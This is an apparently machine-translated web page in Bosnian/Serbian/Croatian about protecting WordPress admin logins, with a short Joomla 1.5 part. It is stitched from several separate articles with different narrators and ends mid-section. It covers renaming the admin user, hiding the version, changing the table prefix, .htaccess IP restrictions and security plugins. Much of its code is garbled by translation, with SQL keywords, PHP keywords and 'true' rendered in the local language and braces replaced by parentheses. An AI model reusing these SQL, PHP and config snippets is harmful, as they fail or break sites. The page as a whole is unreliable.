Napadaju wordpress admin panel šta da rade. Pouzdana WordPress zaštita od hakovanja. Koristite sigurnu vezu

Iz članka ćete naučiti:

1. Koristite dobru prijavu.

Zaštita WordPress stranice počinje od elementarnog - kreiranja dobrog logina. Prilikom instaliranja WordPress-a, korisnici često koriste prijavu koju instalater nudi po defaultu, naime − admin. Ovo je ono što botovi koji traže rupe u sigurnosti vaše stranice prije svega provjeravaju. Koristeći ovu prijavu, vi već dajete polovinu potrebnih informacija za hakere, a oni samo moraju pogoditi lozinku.

Ako ste već instalirali platformu i radite na svojoj web stranici, malo je vjerojatno da ćete htjeti ukloniti instalaciju i početi ispočetka kako biste koristili sigurniju prijavu. Postoji izlaz:

Korak 1 - Kreiranje novog korisnika

Prijavite se na WordPress admin panel i kreirajte novi nalog sa složenijom prijavom, sa punim pristupom svim funkcijama sajta, odnosno administratorskim pravima.

U glavnom meniju sa leve strane izaberite Korisnici >> Dodaj novo.

Unesite sve potrebne informacije za novog korisnika, definirajući njegovu ulogu kao "Administrator" i pritisnite "Dodaj novog korisnika".

Korak 2 - Brisanje administratorskog korisnika

Nakon toga, odjavite se iz kontrolnog sistema, prijavite se sa novim račun i izbrišite korisnika admin iz sistema na jedan od sljedećih načina:

Metoda 1 – Iz glavnog menija sa leve strane izaberite Korisnici >> Svi korisnici. Zadržite pokazivač iznad korisničkog imena admin i vidjet ćete funkciju "Izbriši".

2. metod – Iz glavnog menija sa leve strane izaberite Korisnici >> Svi korisnici. Pronađite korisnika admin, označite ga i iz padajućeg menija "Akcije" izaberite "Izbriši". Nakon toga kliknite na opciju "Primijeni" ispod liste korisnika. Ova opcija je korisna ako trebate ukloniti više korisnika odjednom.

Također možete promijeniti korisničko ime admin putem upita baze podataka:
UPDATE wp_users SET user_login = 'new_login' WHERE user_login = 'admin';

Ova metoda ima minus: autor za postove koje je napisao korisnik admin, neće se mijenjati. Da biste ovo popravili, morate napraviti još jedan upit bazi podataka:
UPDATE wp_posts SET post_author = 'new_login' GDJE post_author = 'admin';

2. Koristite složenu i jedinstvenu lozinku.

Zaštita WordPress admin područja je, naravno, nemoguća bez jake, dobre lozinke. Važno je da bude jedinstven i da sadrži brojeve, slova različitih registara, znakove interpunkcije, simbole itd. Lozinke kao što su: pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, vaš datum rođenja, itd. – nisu pouzdani, ali ih mnogi korisnici nastavljaju koristiti. Primjer dobre lozinke: pcVaOF8r39. Naravno, biće vam teško zapamtiti takvu lozinku, ali za to postoji niz programa koji pohranjuju i generiraju lozinke, a mogu se integrirati i u sučelje vašeg pretraživača (na primjer, Password Agent, KeyPass, Roboform, itd.)

Ako i dalje želite da pamtite svoje lozinke napamet, preporučujemo da kreirate kombinovanu lozinku od imena/reči koje dobro poznajete, sa nekoliko velikih slova/brojeva na nasumično odabranim mestima, i nekoliko posebnih znakova na početku ili na kraju . Takvu lozinku će također biti teško pogoditi, ali će je biti dovoljno lako zapamtiti.

Ne zaboravite redovno ažurirati svoje lozinke.

3. Ažurirajte svoju verziju WordPress-a.

WordPress brine o svojim korisnicima i zato možete pronaći obavještenja o odjavljivanju u admin panelu. nova verzija. Preporučujemo da ažurirate čim ga vidite, jer je jedno od najčešćih kršenja sigurnosti vaše stranice korištenje zastarjela verzija platforme.

4. Sakrij verziju WordPress-a.

WordPress podrazumevano dodaje broj trenutne verzije izvor vaše datoteke i stranice. A kako često nije uvijek moguće ažurirati verziju WordPress-a na vrijeme, to može postati slaba tačka vašu web stranicu. Znajući koju verziju WordPress-a imate, haker može učiniti mnogo štete.

Uz pomoć fajla functions.php možete onemogućiti prikaz informacija o verziji vaše platforme. Da biste to učinili, morate otvoriti datoteku functions.php, koji se nalazi u korijenskom folderu trenutne teme vaše web stranice (wp-content/themes/current_wordpress_theme), i dodajte sljedeći kod:
remove_action('wp_head', 'wp_generator');

Ili možete dodati sljedeći kod u datoteku functions.php:

/* Sakrij stringove verzije WP iz skripti i stilova
* @return (string) $src
* @filter script_loader_src
* @filter style_loader_src
*/
funkcija fjarrett_remove_wp_version_strings($src) (
globalno $wp_version;
parse_str(parse_url($src, PHP_URL_QUERY), $query);
if (!empty($query['ver']) && $query['ver'] === $wp_version) (
$src = remove_query_arg('ver', $src);
}
return $src;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* Sakrij nizove WP verzije iz meta oznake generatora */
funkcija wpmudev_remove_version() (
povratak";
}
add_filter('the_generator', 'wpmudev_remove_version');

Osim gore navedenog, naći ćete u bilo kojem folderu WordPress teme header.php fajl. Takođe navodi verziju vaše instalacije, koja je vrlo interesantna za hakera, kao što je ranije pomenuto. Uklanjanjem sljedeće linije iz datoteke, riješit ćete se ovih dodatnih informacija:

” />

5. Preuzmite teme i dodatke iz pouzdanih izvora.

WordPress je toliko raširen da sve više programera stvara gotove teme i dodatke za njega. Dok će većina njih olakšati korištenje vaše stranice i poboljšati njenu funkcionalnost, neki mogu sakriti vrlo neugodne posljedice u vidu virusa i otvoriti vrata hakerima. Koristite samo pouzdane resurse za preuzimanje za teme i dodatke, kao što je wordpress.org, i obratite pažnju na sva upozorenja o zlonamjernim datotekama koja se pojave. Kao i kod samog WordPress-a, važno je održavati dodatke ažuriranim najnovijim verzijama.

6. Nemojte skladištiti nepotrebne datoteke.

Neaktivne ekstenzije mogu predstavljati ozbiljnu prijetnju sigurnosti vaše stranice. Stoga, slobodno uklonite sve nekorištene dodatke i teme. Na primjer, instalirali ste da testirate i odaberete onaj koji ćete koristiti. Nakon odabira, ne zaboravite izbrisati sve nepotrebne.

7. Redovno proveravajte svoj lokalni računar na viruse.

Poduzimanje različitih koraka za osiguranje vaše WordPress stranice je u redu, ali također morate paziti na svoj računar. Morate imati instaliran antivirus koji se stalno ažurira. U suprotnom, rizikujete da zarazite svoju web stranicu učitavanjem virusnih datoteka.

8. Napravite sigurnosne kopije stranice.

Ne mogu se svi zlonamjerni napadi spriječiti, ali samo jedan uspješan napad može uništiti sve napore rada na vašoj web-lokaciji. Preporučujemo da redovno pravite rezervne kopije veb lokacija. Mnoge hosting kompanije pružaju opciju rezervnih kopija servera iu tom slučaju možete vratiti stranicu iz kopije koja je dostupna na serveru.

Instaliranjem WordPress dodatka za rezervnu kopiju baze podataka možete dodatno osigurati bazu podataka vaše web stranice. Postavke dodatka vam omogućavaju da postavite opciju slanja dnevne sigurnosne kopije baze podataka u poštansko sanduče kontakata.

9. Koristite sigurnu vezu.

Ako više volite da otpremate svoje datoteke pomoću FTP klijenta, koristite siguran protokol za povezivanje sa SFTP serverom.

10. Kreirajte .htaccess datoteku.

Hotlink zaštitni kod:

Rewrite Engine On
RewriteCond %(HTTP_REFERER) !^http://(.+\.)?vaša domena\.com/
RewriteCond %(HTTP_REFERER) !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Hotlinking je umetanje slike sa vašeg servera na tuđu web stranicu/blog. Saobraćaj ide direktno na vaš server.

Sa gornjim kodom, možete natjerati server da provjeri odakle tačno dolazi zahtjev: ako sa stranica vaše web stranice, server daje sliku korisniku bez problema; ako je sa tuđe web stranice, prikazuje sliku s greškom.

11. Promijenite prefiks tablica baze podataka.

WordPress zaštita od hakera također će se povećati ako uklonite početni prefiks wp_- ovo će zakomplikovati potragu za uljezima. Razmotrimo nekoliko načina:

Metoda 1 - Pogodno za nove instalacije putem Softaculousa
Ako vam vaš hosting provajder dozvoljava da koristite Softaculous skriptu za instalaciju WordPress-a, tada možete promijeniti prefiks tokom početne instalacije: u odjeljku Napredne opcije morat ćete unijeti potrebne promjene.

Metoda 2 – Za web stranice uživo i nove instalacije WordPress-a
Ako je vaš WordPress već dugo instaliran i stranica radi, onda možete promijeniti prefiks pomoću programa phpMyAdmin.

Odaberite potrebnu bazu podataka sa liste i napravite sljedeći upit za bazu podataka:

RENAME table `wp_commentmeta` TO `newprefix_commentmeta`;
RENAME table `wp_comments` U `newprefix_comments`;
PREIMENITE tabelu `wp_links` U `newprefix_links`;
PREIMENUITE tablicu `wp_options` U `newprefix_options`;
PRENAMENI tabelu `wp_postmeta` U `newprefix_postmeta`;
PREIMENITE tabelu `wp_posts` U `newprefix_posts`;
PREIMENITE tabelu `wp_terms` U `newprefix_terms`;
PREIMENUJTE tabelu `wp_term_relationships` U `newprefix_term_relationships`;
PREIMENI tabelu `wp_term_taxonomy` U `newprefix_term_taxonomy`;
PREIMENITE tabelu `wp_usermeta` U `newprefix_usermeta`;
PREIMENITE tabelu `wp_users` U `newprefix_users`;

gdje "newprefix_" treba zamijeniti novim prefiksom koji želite koristiti umjesto prefiksa "wp_".

Nakon toga, vidjet ćete novi prefiks u tablicama baze podataka:

Da biste bili sigurni da su sve promjene bile uspješne i da se prefiks wp_ više ne koristi u tabeli _options i _usermeta, morat ćete napraviti još jedan upit bazi podataka:

SELECT * IZ `newprefix_options` GDJE `option_name` KAO '%wp_%'

ODABERITE * IZ `newprefix_usermeta` GDJE `meta_key` KAO '%wp_%'

Kao rezultat toga, možete pronaći brojne prefikse koje ćete morati ručno preimenovati pomoću gumba Promjena:

Broj promjena koje trebate napraviti može varirati. Ali svi prefiksi wp_ morate promijeniti na svoj novi prefiks da bi web stranica ispravno funkcionirala.

Nakon toga, ne zaboravite promijeniti i prefiks wp-config.php fajl:

Također možete koristiti posebne dodatke za promjenu prefiksa baze podataka: Promijenite DB prefiks ili Promijenite prefiks tablice.

12. Ograničite broj pokušaja pristupa.

Najčešće, napadači čine ogroman broj pokušaja da uđu na vašu stranicu, podižući lozinku. Možete konfigurirati sistem tako da IP adresa bude blokirana nekoliko sati nakon određenog broja neuspjelih pokušaja prijave.

Da biste to učinili, možete koristiti dodatne dodatke, kao što su zaključavanje prijave ili ograničenje pokušaja prijave. U postavkama ovih dodataka možete samostalno podesiti broj pokušaja prijave i vrijeme blokiranja.

Dodatno, moguće je ukloniti prikaz poruke da su uneseni login i lozinka netačni. Uostalom, to je i informacija koja može pomoći napadaču.

Da biste uklonili izlaz ove poruke, morate otvoriti datoteku functions.php, koji se nalazi u trenutnom folderu tema vaše web stranice (wp-content/themes/current_wordpress_theme) i dodajte ovaj kod:
add_filter('login_errors',create_function('$a', "vrati null;"));

13. Uklonite readme.html i licence.txt.

Datoteke readme.html i licence.txt prisutne su u osnovnom folderu bilo koje WordPress instalacije. Ne trebaju vam ovi fajlovi i oni mogu izložiti hakere njihovim zločinima. Na primjer, da saznate trenutnu verziju vašeg WordPress-a i mnoge druge korisne stvari za hakiranje web stranice. Preporučujemo da ih uklonite odmah nakon instaliranja WordPress-a.

14. Koristite SSL certifikat.

Za prijenos sigurnih informacija i povjerljivosti razmjene podataka, preporučujemo korištenje SSL protokola. Ovo posebno vrijedi za online trgovine ako ne želite da se osobni podaci o vašim kupcima prenose na nesiguran način.

Prije svega, morat ćete ga instalirati za ime vaše domene.

Nakon toga možete podesiti obaveznu upotrebu SSL protokola prilikom prijavljivanja na kontrolnu ploču vaše stranice. Da biste to učinili, otvorite wp-config.php datoteku koja se nalazi u korijenskom folderu vaše web stranice i dodajte sljedeći red:
define('FORCE_SSL_ADMIN', istina);

15. Izmijenite datoteku wp-config.php.

Dodavanjem ovog koda u wp-config.php datoteku, također možete ojačati zaštitu vaše web stranice:

Ograničenje promjena teme i dodataka:
define('DISALLOW_FILE_EDIT', istina);

Onemogućavanje mogućnosti instaliranja i uklanjanja dodataka:
define('DISALLOW_FILE_MODS', istina);

Dodavanje solnih ključeva ili takozvanih sigurnosnih ključeva: prvo ćete morati pronaći takve nizove wp-config.php fajl:

Vidjet ćete da su ključevi već instalirani i da ih možete promijeniti. Ili ćete vidjeti redove poput ove: 'stavite svoju jedinstvenu frazu ovdje', što ukazuje da ključevi još nisu postavljeni:
/**#@+
* Jedinstveni ključevi i soli za autentifikaciju.
*
* Promijenite ih u različite jedinstvene fraze!
* Možete ih generirati pomoću (@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org usluge tajnog ključa)
* Možete ih promijeniti u bilo kojem trenutku kako biste poništili sve postojeće kolačiće. Ovo će primorati sve korisnike da se moraju ponovo prijaviti.
*
* @od 2.6.0
*/
define('AUTH_KEY', 'stavite svoju jedinstvenu frazu ovdje');
define('SECURE_AUTH_KEY', 'stavite svoju jedinstvenu frazu ovdje');
define('LOGGED_IN_KEY', 'unesite svoju jedinstvenu frazu ovdje');
define('NONCE_KEY', 'stavite svoju jedinstvenu frazu ovdje');
define('AUTH_SALT', 'stavite svoju jedinstvenu frazu ovdje');
define('SECURE_AUTH_SALT', 'stavite svoju jedinstvenu frazu ovdje');
define('LOGGED_IN_SALT', 'unesite svoju jedinstvenu frazu ovdje');
define('NONCE_SALT', 'stavite svoju jedinstvenu frazu ovdje');

Želio bih posebno spomenuti neke dodatke:

Ovo je WordPress sigurnosni dodatak koji vam omogućava da skenirate svoju web stranicu u potrazi za zlonamjernim kodom, hakerskim rupama i puškarnicama, prikazujući web stranicu i analizu prometa u realnom vremenu. Postoji i mogućnost podešavanja automatskog skeniranja i još mnogo toga.

Ovaj dodatak provjerava vašu web stranicu na različite sigurnosne propuste i nudi niz metoda za njihovo popravljanje. Na primjer, lozinke, različite dozvole za datoteke, zaštita baze podataka, zaštita informacija o verziji WordPressa, zaštita administratora i još mnogo toga.

Ovaj dodatak vam omogućava da osigurate korisničke naloge i prijave, baze podataka i sistem datoteka, spriječite napade grubom silom (napadi pogađanjem lozinke), skenirate web stranicu i još mnogo toga.

Koliko god tužno zvučalo, zaštita WordPress-a je složena stvar, a metode opisane u ovom članku ne garantuju 100% da će vaša stranica biti u potpunosti zaštićena od bilo kakvih lažnih aktivnosti. Međutim, ne treba ih zanemariti, jer će značajno smanjiti mogućnost hakovanja stranice od strane uljeza.

WordPress je veoma popularan CMS, to nije nesumnjivo njegov plus, postoji mnogo dodataka za svaki zadatak, ali to je i njegova slabost, jer što je CMS popularniji za sajt, to je više napada na njega, tačnije, zanimljiviji za hakera, budući da je pronašao ranjivost Sa WordPress-om, stotine hiljada sajtova je izloženo napadačima, tako da zaštiti vaše WordPress stranice treba posebnu pažnju.

Zašto su WordPress sajtovi hakovani?

Svi popularni CMS (website engines) su hakovani, a WordPress nije izuzetak, hakujem uglavnom uz pomoć tzv. programa (skripti) - eksploatacija, da bih stekao kontrolu nad sajtom, to se radi uglavnom radi kreiranja linkova sa vaše stranice na druge resurse i kreirati BotNet koji se bavi DDoS napadima na druge servere, dok stranica ostaje operativna i nikada nećete vidjeti golim okom da je zaražena. U svakom slučaju, hakiranje će loše uticati na vašu web stranicu, pa čak možete i nestati iz rezultata pretraživanja.

Kao što sam rekao, hakovanje se dešava automatski, nije teško odrediti CMS sajta, postoji mnogo online servisa za to, često napadački program pokušava da pogodi lozinku iz administrativnog dela sajta, tj. ide na adresu your-site.ru/wp-admin i pokušava pogoditi lozinku za vašeg korisnika, nije teško saznati korisničko ime, pod njim pišete članke, tako da će prijava biti vidljiva botovima, oni znaju gde tražiti. osim, naravno, ako ga niste zatvorili dodatkom, o jednom od kojih ćemo govoriti u nastavku. Lozinka administratora sajta bi trebalo da bude veoma složena, ali čak i ako je ovaj uslov ispunjen, ne možete dozvoliti botovima da slože (brute) lozinku sa „admin panela“, jer to nije neophodno opterećenje na serveru, zamislite da to radi nekoliko desetina botova iz različitih dijelova svijeta.

Dodatak za zaštitu WordPressa od napada

Pređimo na dodatak, vrijedan poslušanja nekoliko, pričajmo o jednostavnijem i razumljivijem, koristim ga na mnogim svojim projektima, za kupce, odlično se nosi sa zadacima zaštite stranice -

Ovaj dodatak je prilično jednostavan za učenje, i 90% rusificiran, instalira se kao i svaki dodatak iz WordPress repozitorija, nakon instalacije potrebno ga je aktivirati i izvršiti osnovna podešavanja. Pojavljuje se u glavnom meniju u WordPress administratoru

Kontrolna tabla dodataka WP Security

Nakon odlaska na postavke dodatka, dolazimo do kontrolne ploče. Ovdje možete izvršiti glavne važne postavke.

  1. Prikazuje zadnjih 5 autorizacija u vašem admin panelu, naznačeni su korisnik i IP adresa, na primjer, odmah vidim svoje IP adrese, postoje samo dva, tako da ne sumnjam da neko drugi zna moju lozinku iz administrativnog dijela .
  2. Odeljak najvažnijih funkcija, sve treba da bude uključeno ovde i sa svim se slažete.
  3. Dodatak može pratiti promjene fajlova na hostingu, može poslati izvještaj na vašu poštu, a vi ste uvijek svjesni koje fajlove ste promijenili, ovo je vrlo korisno ako ste prenijeli neku skriptu ili bilo koji fajl sa zlonamjernim kodom , odmah ćete to vidjeti u izvještaju, jedina negativna, nakon ažuriranja svih drugih dodataka koje ste instalirali ili samog WordPress motora, WP Security će vidjeti sve ove promjene i poslati vam ogromnu listu, ali možete se naviknuti na ove izvještaje , jer znate kada ste sami ažurirali fajlove.
  4. Ova stavka mijenja standardnu ​​adresu admin panela web stranice yoursite.ru/wp-admin u yoursite.ru/luboe-slovo , ovo će spasiti vaš admin panel od nekih nesretnih hakera i botova, ali nažalost ne od svih, pogotovo onih naprednih i dalje pronađite, mogu to prosuditi gledajući odeljak „Ovlašćenja“, ali više o tome kasnije.
  5. Ovu stavku treba isključiti, kao na snimku ekrana, potrebna je samo kada želite da stavite sajt na održavanje, posetiocima će biti dat znak sa porukom da je sajt u toku tehničkih radova, ponekad je korisno, npr. , prilikom promjene dizajna stranice, ili kod nekih globalnih promjena, ne zaboravite da u ovom načinu rada roboti za pretraživanje ne mogu vidjeti ni vašu stranicu, nemojte je dugo zatvarati.

Zaštita WordPress administratora od pogađanja lozinke

Idemo sada na stavku menija - Autorizacija, po mom mišljenju veoma korisna stavka, i treba je konfigurisati, kao što je na jednom od mojih sajtova. sa posjećenošću od oko 1000 ljudi, dodatak hvata na desetine pokušaja dnevno pogađanja lozinke na admin panelu i dodaje IP adrese hakera na crnu listu, tj. blokira ga u potpunosti, stranica prestaje da odgovara na ovu IP adresu, čime se poništavaju pokušaji podizanja lozinke na ekranu postavki koje ja radim.

  1. Ostavljam broj pokušaja da "pogrešite" -3, nemojte raditi manje, sami možete pogrešno upisati lozinku i moraćete da se nađete na crnoj listi sa svojim IP-om
  2. Ovo je vrijeme nakon kojeg se brojač nevažećih pokušaja prijave resetuje.
  3. Period blokiranja IP adresa sa kojih je bilo pogrešnih pokušaja autorizacije, postavio sam više, u minutama, tj. kupanje dugo, na ekranu košta 6.000.000 minuta, ovo je oko 11 godina, mislim da je dovoljno

Svim blokiranim IP adresama bit će odbijen pristup ne samo admin panelu, već i cijeloj web stranici, imajte to na umu

Lista blokiranih IP adresa

  1. IP adresa napadača
  2. Usput, login na koji je odabrana lozinka je ispravan
  3. datum kada je napravljeno automatsko zaključavanje

Bijela lista adresa za admin panel

Da biste dozvolili pristup administrativnom dijelu WordPress stranice samo sa određenih IP adresa, možete aktivirati bijelu listu adresa u postavkama dodatka.

  1. aktiviranje ove opcije
  2. ovdje je vaša trenutna IP adresa
  3. u ovo polje unesite sve IP adrese sa kojih je dozvoljen pristup admin panelu

Ako trebate navesti raspon IP adresa, onda umjesto broja koristite zvjezdicu, na primjer 192.168.5.* - ova konstrukcija će dati pristup wordpress admin panelu sa svih IP adresa počevši od ovih brojeva, ovaj metod može biti koristan za one koji nemaju namjensku ip adresu, a ona se stalno mijenja, na primjer, kada radite sa mobilnim internetom, po pravilu će opseg ostati unutar prve dvije cifre, kao što je na primjer 192.168.*. *

Vrijeme čitanja: 4 min

Prije godinu dana, opterećenje mog servera je vrlo često prelazilo granicu dozvoljenu tarifnim limitom. Pritom, problem nije bio u samim stranicama, već u banalnom napadu uljeza na admin panel, kako bi dobili pristup u neke svoje svrhe.

Danas ću vam reći kako sam se izborio sa problemom, što vam savjetujem da za svaki slučaj uradite kod kuće.

Kao rezultat toga, odlučeno je da se promijeni adresa obrasca za prijavu u admin panelu, kao i da se pokrije admin panel za sve autsajdere koji nemaju moj IP.

Vrijedi napomenuti da su neke hosting kompanije same automatski kreirale novu admin adresu za sve korisnike. Ako koristite usluge takvog hostinga, nemojte čitati dalje članke i ne gubite vrijeme.

Kako promijeniti adresu administratora WordPress-a

Već sam objavio ovaj članak. Ovdje se čini da je rezultat sličan, ali učinak i svrha su drugačiji.

Ne zaboravite napraviti sigurnosnu kopiju datoteka sa kojima radite.

  • Prvo, kopirajte datoteku wp-login.php iz korijena stranice (gdje se nalazi wp-config.php) na ftp na vaš računar.
  • Preimenujte ga kako god želite. Na primjer vhod.php
  • Otvorite ovu datoteku besplatnim programom Notepad++ (ili bilo čime što želite da uredite) i zamijenite sva pojavljivanja fraze wp-login.php sa vhod.php .

To možete brzo učiniti pritiskom na CTRL+F u Notepad++. Pa, u prozor koji se pojavi unesite:

Tako sam u sekundi zamijenio pojavljivanje fraze koja mi je bila potrebna u cijelom fajlu. Naišao je 12 puta.

Otpremite novi fajl na ftp.

Slično ćete morati da uradite u datoteci general-template.php, koju ćete naći u folderu wp-includes upravo tamo na ftp-u. One. promijenite pojavu fraze wp-login.php u vhod.php , ali nemojte mijenjati samo ime datoteke!

Sada imate .htaccess fajl na istom mestu u korenu sajta. Također ga kopiramo na naš računar i otvaramo ga za uređivanje (možete koristiti uobičajeni Windows Notepad). Ubacujemo takav komad koda koji svima blokira pristup datoteci wp-login.php

Naredi odbijanje, Dozvoli odbijanje od svih

< Files wp - login . php >

Order Deny

Odbiti od svih

< / Files >

Upravo je ovaj korak uklonio opterećenje, a također je sakrio obrazac za autorizaciju. Opterećenje je uklonjeno umetanjem predstavljenog koda u .htaccess: ako je bilo poziva na http://site.ru/wp-login.php, onda bi vratio grešku 403, a ne 404.

Da ukratko ponovimo algoritam rada:

  • Preimenujte datoteku wp-login.php u proizvoljno ime i zamijenite pojavljivanja imena u njoj novim.
  • Slično, stari naziv wp-login.php u datoteci general-template.php zamjenjujemo novim.
  • U .htaccess fajlu propisujemo zabranu pristupa wp-login.php za sve

Nakon ažuriranja WordPress-a, potrebno je popraviti samo datoteku general-template.php. Ali pošto motor se ne ažurira tako često - ovo je sitnica u usporedbi s učinkom.

Stavili smo ograničenje na ulazak preko IP-a preko .htaccess-a

Kao dodatnu mjeru zaštite stranice, usvojio sam ograničenje ulaska u admin panel putem IP-a. Problem je riješen vrlo jednostavno: napravite prazan .htaccess fajl i dodajte mu sljedeći kod

order deny, dozvoli dozvoli od 192.168.0.1 zabrani od svih

naručiti odbiti, dozvoliti

dozvoli od 192.168.0.1

poriču od svih

Spremimo datoteku i učitamo je u folder wp-admin na istom mjestu u korijenu stranice.

Umjesto mog IP-a iz primjera, stavite svoj pravi. Štaviše, možete dodati nekoliko IP adresa iz novog reda svaki:

naruči odbije, dopusti dozvoli sa 126.142.40.16 dozvoli od 195.234.69.6 zabrani od svih

naručiti odbiti, dozvoliti

dozvoli od 126.142.40.16

dozvoli sa 195.234.69.6

poriču od svih

Ako je IP dinamičan, onda možete staviti brojeve samo do prve-druge-treće tačke:

Da li već znate kako da uđete u WordPress admin područje?

To možete učiniti na najmanje četiri načina dodavanjem sljedećeg na adresu vaše web stranice:

  1. /admin, tj. ovako: http://yoursite/admin
  2. /wp-admin
  3. /Ulogovati se
  4. /wp-login.php

Općenito, sve tri prve opcije putem preusmjeravanja (preusmjeravanja) će vas ipak odvesti na stranicu: http://your_site/wp-login.php

Ispostavilo se da bilo ko može dodati bilo koji od četiri gore opisana prefiksa na adresu vaše stranice i vidjeti ulaz u administrativni panel:

Naravno, to uopće ne znači da i ovo svako može lako ući u admin panel, jer i dalje mora znati korisničko ime ili vaš e-mail i lozinku.

Ako vaš administrator ima login: - onda to nije nimalo razborito s vaše strane i napadač će morati samo da pogodi ili pogodi vašu lozinku.

Osim toga, da li ste vidjeli natpis: Korisničko ime ili e-mail ? Da, da, to je e-mail koji WordPress može koristiti kao korisničko ime. Ali možete navesti adresu e-pošte negdje na stranici koja odgovara e-mailu korisnika administratora. Ispostavilo se da je prva stvar koju napadač može pokušati da unese vaš e-mail i tu će mu WordPress ponovo pomoći, jer ako se e-mail ne podudara, vidjet će ovu poruku:

i ako je e-mail ispravan, WordPress će napisati da lozinka za njega nije tačna:

Kao rezultat toga, imamo situaciju u kojoj će potencijalni napadač samo trebati da pogodi ili pogodi vašu lozinku da bi hakovao vašu web lokaciju (pristup admin panelu).

Kako zaštititi ulaz u admin panel od potencijalne prijetnje? Odgovor je jednostavan - pokušajte povećati broj nepoznanica potrebnih za unos.

A sada pogledajmo izbliza:

  1. Ako je moguće, uvjerite se da e-mail korisnika administratora nije spomenut nigdje na stranici - javni e-mail bi trebao biti nešto drugo.
  2. Vaša lozinka ne bi trebala biti jednostavna, kada instalirate WordPress sam generira složenu lozinku za vas, ako ne želite da je koristite, smislite neku manje ili više složenu lozinku koja uključuje male i velike znakove, brojeve i neke znakove poput -, ?, _ itd.
  3. Vaše korisničko ime također ne bi trebalo biti jednostavno, ne: admin, menadžer, root, administrator, korisnik i druge jednostavne riječi!
  4. I na kraju, trebate unijeti treću najvažniju nepoznanicu - promijenite URL za prijavu administratora, za to instalirajte jednostavan dodatak: WPS Hide Login
WPS Sakrij prijavu

Jednostavan, besplatan i prilično popularan dodatak koji vam omogućava promjenu URL-a za prijavu administratora.

Nakon instaliranja i aktivacije dodatka, potrebno je da odete na administratorski odjeljak: Postavke / Općenito, zatim skrolujte do samog dna stranice i pogledajte samo jedan parametar koji je dodao ovaj dodatak:

Po defaultu, dodatak predlaže korištenje http://yoursite/login login - ali ovo nikako nije najbolja opcija! Smislite nešto svoje, na primjer: yyy12_go)))

Nakon promjene ovog parametra, ne zaboravite kliknuti na dugme Sačuvaj promjene– u suprotnom, kada je dodatak aktivan, bit ćete prijavljeni putem http://yoursite/login

Obavezno se pokušajte odjaviti i ponovo prijaviti na admin panel, ali na novoj adresi za prijavu koju ste sami smislili, i što je najvažnije, nemojte je zaboraviti!

Nakon promjene ulazne tačke na admin panel, prilikom pokušaja pristupa standardnim URL-ovima, korisnik će dobiti stranicu s greškom 404.

Pažnja! Ako iznenada zaboravite novu adresu za prijavu administratora, morat ćete onemogućiti ovaj dodatak. To možete učiniti bez ulaska u admin panel ako imate pristup fasciklama i datotekama na web lokaciji. Vi samo trebate preimenovati ili izbrisati folder dodataka wps-hide-login, koji će biti u folderu dodaci(fascikla plugins je u folderu wp-content).

Kao rezultat: nakon primjene svih gore navedenih mjera, trebali bismo dobiti zaštitu za prijavu na admin panel sa tri nepoznate: e-mail/korisničko ime, složena lozinka i vlastiti jedinstveni URL za prijavu - a to može uvelike zakomplicirati pokušaje mladih. hakeri)

Pozdrav, dragi čitaoci blog stranice. Danas želim govoriti o sigurnosti rada i nekim metodama zaštite stranice od hakovanja. Nažalost, nisam stručnjak za ovu oblast i moje znanje ne izlazi puno iz okvira članka o tome, već ću jednostavno opisati svoje nedavno iskustvo. Nisam koristio ništa komplikovano, ali se nadam da će to povećati sigurnost rada sa mojim sajtovima.

Biće o tome dvostruku autentifikaciju za ulazak u admin panel motora vaš sajt (trebalo bi da radi na bilo kom CMS-u, ali sam lično testirao samo na WordPress-u i Joomli). Zaštita je postavljena na nivou servera, tako da svi pokušaji pogađanja lozinke na admin panelu (brute force) neće stvoriti povećano opterećenje na hostingu i prilično ga je teško zaobići. Postavlja se jednostavno (bukvalno u nekoliko koraka) i od svih znanja zahtijeva samo pažnju i mogućnost pristupa stranici preko FTP-a.

Pa, daću i par akcija koje sam primenio na sajtove na već zastarelim Joomla 1.5 motorima, na koje nemam smisla prenositi, ali koje stalno kvare i koriste server za slanje neželjene pošte. Opisane radnje sam obavio nedavno, tako da ne mogu da konstatujem da je zaraza sajtova virusima prestala, ali nadam se da jeste. Općenito, pokušao sam malo poboljšati otpornost na hake Joomla 1.5.

Kako zaštititi Joomla 1.5 od hakova i virusa

Kao što sam već spomenuo, problem leži u stalnim hakovima na moja dva sajta, koji koriste Joomla 1.5. Možete ih smatrati napuštenim, jer im ne dodajem nove materijale, ali redovno ostvaruju prihod (od objavljivanja članaka sa Miralinksa i Webartexa, kao i linkova sa Gogetlinksa). Općenito, šteta ih je baciti, ali ih prenijeti na novu verziju motora "za otpad" (šteta za utrošeno vrijeme i trud).

Ostaje ili stalno pratiti opterećenje servera i, kada se poveća, tražiti školjke i drugi zlonamjerni softver među datotekama motora ili nekako ojačati zaštitu. Da bih tražio zlonamjerni softver, preuzimam datoteke motora na kompjuter i provjeravam ih pomoću DoctorWeb-a i Aibolit-a. Prvi ne nalazi sve, a drugi prečesto vidi neprijatelja tamo gde ga nema, ali ja ne znam druge efikasne metode. Iako postoji i desetine programa, ali ovo je već pogodnije za svakoga.

Usput, scenario Aibolit može da radi ne samo na serveru, već i direktno na računaru u fascikli sa preuzetim fajlovima motora (samo ne zaboravite da isključite standardni antivirus prilikom preuzimanja sajta, jer može da popravi neke fajlove, ali oni i dalje će ostati na serveru).

Detaljne instrukcije su date u videu ispod, a ukratko, preuzimate PHP tumač jezika sa Microsoft web stranice i instalirate ga. Nakon toga otvorite datoteku skripte Aibolit pod nazivom ai-bolit.php koristeći ovaj interpreter:

Brzina indeksiranja ovisi o brzini vašeg računala i broju datoteka u mehanizmu vaše web stranice. Trebalo mi je nekoliko sati za https:// stranicu, jer čak i Aibolit sumnja da slike skrivaju viruse, a ja imam puno istih slika, a keš datoteke oduzimaju dosta vremena prilikom skeniranja. Za stranice na Joomla 1.5 provjera je bila mnogo brža.

Odlučio sam da provedem dan tražeći načine za poboljšanje sigurnosti stranice. Uspjeli smo napraviti dosta, ali ipak bolje nego ništa. Počnimo sa jačanje zaštite (od smanjenja ranjivosti) dva sajta na Joomli 1.5. Urađeno je sljedeće:


Kako drugačije zaštititi Joomla 1.5 od virusa i stream hakova

